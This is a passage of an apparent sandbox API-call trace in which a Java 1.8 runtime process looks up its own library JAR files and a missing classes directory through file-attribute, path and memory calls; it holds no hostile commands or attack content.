Files\\Java\\jre1.8.0_171\\lib\\resources.jar", nBufferLength=0x9, lpBuffer=0x208db78, lpFilePart=0x208db70 | out: lpBuffer="", lpFilePart=0x208db70*=0x0) returned 0x35 [0105.352] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\resources.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d910 | out: lpFileInformation=0x208d910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb478df6, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb478df6, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb480313, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x354ab0)) returned 1 [0105.353] free (_Block=0x122f6690) [0105.353] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar") returned 0x34 [0105.353] malloc (_Size=0x74) returned 0x122f5f90 [0105.353] wcscpy (in: _Dest=0x122f5f90, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar" [0105.353] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar", nBufferLength=0x9, lpBuffer=0x208db78, lpFilePart=0x208db70 | out: lpBuffer="", lpFilePart=0x208db70*=0x0) returned 0x35 [0105.353] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\resources.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d910 | out: lpFileInformation=0x208d910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb478df6, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb478df6, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb480313, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x354ab0)) returned 1 [0105.354] free (_Block=0x122f5f90) [0105.354] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar") returned 0x34 [0105.354] malloc (_Size=0x74) returned 0x122f6010 [0105.354] wcscpy (in: _Dest=0x122f6010, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar" [0105.355] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar", nBufferLength=0x9, lpBuffer=0x208dc58, lpFilePart=0x208dc50 | out: lpBuffer="", lpFilePart=0x208dc50*=0x0) returned 0x35 [0105.355] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\resources.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d9f0 | out: lpFileInformation=0x208d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb478df6, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb478df6, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb480313, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x354ab0)) returned 1 [0105.355] free (_Block=0x122f6010) [0105.356] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned 0x26 [0105.356] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned 0x2d [0105.356] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar", lpFindFileData=0x208d0b0 | out: lpFindFileData=0x208d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8beacf, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb8beacf, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed0077b9, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x341fe37, dwReserved0=0x0, dwReserved1=0x0, cFileName="rt.jar", cAlternateFileName="")) returned 0x4265c0 [0105.357] FindClose (in: hFindFile=0x4265c0 | out: hFindFile=0x4265c0) returned 1 [0105.357] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned 0x26 [0105.357] wcslen (_String="rt.jar") returned 0x6 [0105.357] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned 0x2d [0105.358] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned 0x2d [0105.358] malloc (_Size=0x66) returned 0x1220f640 [0105.358] wcscpy (in: _Dest=0x1220f640, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar" [0105.358] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar", nBufferLength=0x9, lpBuffer=0x208dc58, lpFilePart=0x208dc50 | out: lpBuffer="", lpFilePart=0x208dc50*=0x0) returned 0x2e [0105.358] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\rt.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d9f0 | out: lpFileInformation=0x208d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8beacf, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb8beacf, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed0077b9, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x341fe37)) returned 1 [0105.358] free (_Block=0x1220f640) [0105.358] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned 0x26 [0105.359] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar") returned 0x35 [0105.359] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar", lpFindFileData=0x208d0b0 | out: lpFindFileData=0x208d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8beacf, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb8beacf, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed0077b9, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x341fe37, dwReserved0=0x0, dwReserved1=0x0, cFileName="rt.jar", cAlternateFileName="")) returned 0xffffffffffffffff [0105.359] GetLastError () returned 0x2 [0105.359] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar") returned 0x35 [0105.359] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar") returned 0x35 [0105.360] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar") returned 0x35 [0105.360] malloc (_Size=0x76) returned 0x122f4890 [0105.360] wcscpy (in: _Dest=0x122f4890, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar" [0105.360] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar", nBufferLength=0x9, lpBuffer=0x208dc58, lpFilePart=0x208dc50 | out: lpBuffer="", lpFilePart=0x208dc50*=0x0) returned 0x36 [0105.360] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\sunrsasign.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\sunrsasign.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d9f0 | out: lpFileInformation=0x208d9f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x208da10, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x208da78, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x220809d, nFileSizeHigh=0x0, nFileSizeLow=0x208da10)) returned 0 [0105.360] GetLastError () returned 0x2 [0105.360] free (_Block=0x122f4890) [0105.360] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned 0x26 [0105.361] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar") returned 0x2f [0105.361] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar", lpFindFileData=0x208d0b0 | out: lpFindFileData=0x208d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed06ba66, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed06ba66, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed08b63d, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x916df, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsse.jar", cAlternateFileName="")) returned 0x426200 [0105.361] FindClose (in: hFindFile=0x426200 | out: hFindFile=0x426200) returned 1 [0105.361] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned 0x26 [0105.361] wcslen (_String="jsse.jar") returned 0x8 [0105.361] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar") returned 0x2f [0105.361] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar") returned 0x2f [0105.361] malloc (_Size=0x6a) returned 0x122f6310 [0105.361] wcscpy (in: _Dest=0x122f6310, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar" [0105.361] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar", nBufferLength=0x9, lpBuffer=0x208dc58, lpFilePart=0x208dc50 | out: lpBuffer="", lpFilePart=0x208dc50*=0x0) returned 0x30 [0105.361] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jsse.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\jsse.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d9f0 | out: lpFileInformation=0x208d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed06ba66, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed06ba66, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed08b63d, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x916df)) returned 1 [0105.362] free (_Block=0x122f6310) [0105.362] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned 0x26 [0105.362] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned 0x2e [0105.362] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar", lpFindFileData=0x208d0b0 | out: lpFindFileData=0x208d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb45a81e, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb45a81e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb45b939, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x1c3c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="jce.jar", cAlternateFileName="")) returned 0x425cc0 [0105.362] FindClose (in: hFindFile=0x425cc0 | out: hFindFile=0x425cc0) returned 1 [0105.362] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned 0x26 [0105.362] wcslen (_String="jce.jar") returned 0x7 [0105.363] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned 0x2e [0105.363] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned 0x2e [0105.363] malloc (_Size=0x68) returned 0x1220f480 [0105.363] wcscpy (in: _Dest=0x1220f480, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar" [0105.363] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar", nBufferLength=0x9, lpBuffer=0x208dc58, lpFilePart=0x208dc50 | out: lpBuffer="", lpFilePart=0x208dc50*=0x0) returned 0x2f [0105.363] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jce.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\jce.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d9f0 | out: lpFileInformation=0x208d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb45a81e, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb45a81e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb45b939, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x1c3c3)) returned 1 [0105.364] free (_Block=0x1220f480) [0105.364] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned 0x26 [0105.364] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar") returned 0x33 [0105.364] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar", lpFindFileData=0x208d0b0 | out: lpFindFileData=0x208d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed0d231e, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed0d231e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed126697, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x2e56fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="charsets.jar", cAlternateFileName="")) returned 0x425d80 [0105.364] FindClose (in: hFindFile=0x425d80 | out: hFindFile=0x425d80) returned 1 [0105.364] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned 0x26 [0105.365] wcslen (_String="charsets.jar") returned 0xc [0105.365] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar") returned 0x33 [0105.365] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar") returned 0x33 [0105.365] malloc (_Size=0x72) returned 0x122f5210 [0105.365] wcscpy (in: _Dest=0x122f5210, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar" [0105.365] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar", nBufferLength=0x9, lpBuffer=0x208dc58, lpFilePart=0x208dc50 | out: lpBuffer="", lpFilePart=0x208dc50*=0x0) returned 0x34 [0105.365] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\charsets.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d9f0 | out: lpFileInformation=0x208d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed0d231e, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed0d231e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed126697, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x2e56fa)) returned 1 [0105.366] free (_Block=0x122f5210) [0105.366] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned 0x26 [0105.366] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar") returned 0x2e [0105.366] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar", lpFindFileData=0x208d0b0 | out: lpFindFileData=0x208d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb461a65, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb461a65, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb4641bd, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x88e49, dwReserved0=0x0, dwReserved1=0x0, cFileName="jfr.jar", cAlternateFileName="")) returned 0x426200 [0105.366] FindClose (in: hFindFile=0x426200 | out: hFindFile=0x426200) returned 1 [0105.366] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned 0x26 [0105.366] wcslen (_String="jfr.jar") returned 0x7 [0105.366] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar") returned 0x2e [0105.367] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar") returned 0x2e [0105.367] malloc (_Size=0x68) returned 0x1220f800 [0105.367] wcscpy (in: _Dest=0x1220f800, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar" [0105.367] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar", nBufferLength=0x9, lpBuffer=0x208dc58, lpFilePart=0x208dc50 | out: lpBuffer="", lpFilePart=0x208dc50*=0x0) returned 0x2f [0105.367] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\jfr.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\jfr.jar"), fInfoLevelId=0x0, lpFileInformation=0x208d9f0 | out: lpFileInformation=0x208d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb461a65, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb461a65, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb4641bd, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x88e49)) returned 1 [0105.367] free (_Block=0x1220f800) [0105.367] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\classes") returned 0x2a [0105.367] malloc (_Size=0x800) returned 0x12d30040 [0105.367] _wfullpath (in: _Buffer=0x12d30040, _Path="C:\\Program Files\\Java\\jre1.8.0_171\\classes", _BufferCount=0x400 | out: _Buffer="C:\\Program Files\\Java\\jre1.8.0_171\\classes") returned="C:\\Program Files\\Java\\jre1.8.0_171\\classes" [0105.368] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\classes") returned 0x2a [0105.368] wcsncmp (_String1="C:\\P", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0105.368] wcslen (_String="C:\\Program Files") returned 0x10 [0105.368] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x208d140 | out: lpFindFileData=0x208d140*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x61f7ccc8, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x61f7ccc8, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x426680 [0105.368] FindClose (in: hFindFile=0x426680 | out: hFindFile=0x426680) returned 1 [0105.368] wcslen (_String="Program Files") returned 0xd [0105.368] wcslen (_String="C:\\Program Files\\Java") returned 0x15 [0105.368] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java", lpFindFileData=0x208d140 | out: lpFindFileData=0x208d140*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0x5848ff34, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x5848ff34, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 0x425d80 [0105.368] FindClose (in: hFindFile=0x425d80 | out: hFindFile=0x425d80) returned 1 [0105.368] wcslen (_String="Java") returned 0x4 [0105.368] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171") returned 0x22 [0105.368] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171", lpFindFileData=0x208d140 | out: lpFindFileData=0x208d140*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xf4cc0a4e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xf4cc0a4e, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jre1.8.0_171", cAlternateFileName="JRE18~1.0_1")) returned 0x426380 [0105.369] FindClose (in: hFindFile=0x426380 | out: hFindFile=0x426380) returned 1 [0105.369] wcslen (_String="jre1.8.0_171") returned 0xc [0105.369] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\classes") returned 0x2a [0105.369] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\classes", lpFindFileData=0x208d140 | out: lpFindFileData=0x208d140*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xf4cc0a4e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xf4cc0a4e, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jre1.8.0_171", cAlternateFileName="JRE18~1.0_1")) returned 0xffffffffffffffff [0105.369] GetLastError () returned 0x2 [0105.369] wcslen (_String="\\classes") returned 0x8 [0105.369] free (_Block=0x12d30040) [0105.369] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\classes") returned 0x2a [0105.370] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\classes") returned 0x2a [0105.370] malloc (_Size=0x60) returned 0x1220f800 [0105.370] wcscpy (in: _Dest=0x1220f800, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\classes" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\classes") returned="C:\\Program Files\\Java\\jre1.8.0_171\\classes" [0105.370] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\classes", nBufferLength=0x9, lpBuffer=0x208db78, lpFilePart=0x208db70 | out: lpBuffer="", lpFilePart=0x208db70*=0x0) returned 0x2b [0105.370] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\classes" (normalized: "c:\\program files\\java\\jre1.8.0_171\\classes"), fInfoLevelId=0x0, lpFileInformation=0x208d910 | out: lpFileInformation=0x208d910*(dwFileAttributes=0x660064, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x413ae0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x48, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0105.370] GetLastError () returned 0x2 [0105.370] free (_Block=0x1220f800) [0105.371] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\classes") returned 0x2a [0105.371] malloc (_Size=0x60) returned 0x1220f800 [0105.371] wcscpy (in: _Dest=0x1220f800, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\classes" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\classes") returned="C:\\Program Files\\Java\\jre1.8.0_171\\classes" [0105.371] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\classes", nBufferLength=0x9, lpBuffer=0x208dc58, lpFilePart=0x208dc50 | out: lpBuffer="", lpFilePart=0x208dc50*=0x0) returned 0x2b [0105.371] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\classes" (normalized: "c:\\program files\\java\\jre1.8.0_171\\classes"), fInfoLevelId=0x0, lpFileInformation=0x208d9f0 | out: lpFileInformation=0x208d9f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x2114050, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x2101000, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x119b0430)) returned 0 [0105.371] GetLastError () returned 0x2 [0105.372] free (_Block=0x1220f800) [0105.372] strlen (_Str="sun/net/www/protocol/jar/Handler") returned 0x20 [0105.374] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar") returned 0x34 [0105.374] malloc (_Size=0x74) returned 0x122f6010 [0105.374] wcscpy (in: _Dest=0x122f6010, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar" [0105.374] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar", nBufferLength=0x9, lpBuffer=0x208e4b8, lpFilePart=0x208e4b0 | out: lpBuffer="", lpFilePart=0x208e4b0*=0x0) returned 0x35 [0105.374] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\resources.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\resources.jar"), fInfoLevelId=0x0, lpFileInformation=0x208e250 | out: lpFileInformation=0x208e250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb478df6, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb478df6, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb480313, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x354ab0)) returned 1 [0105.375] free (_Block=0x122f6010) [0105.377] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned 0x2d [0105.377] malloc (_Size=0x66) returned 0x1220f9c0 [0105.377] wcscpy (in: _Dest=0x1220f9c0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar" [0105.377] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar", nBufferLength=0x9, lpBuffer=0x208e4b8, lpFilePart=0x208e4b0 | out: lpBuffer="", lpFilePart=0x208e4b0*=0x0) returned 0x2e [0105.377] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\rt.jar"), fInfoLevelId=0x0, lpFileInformation=0x208e250 | out: 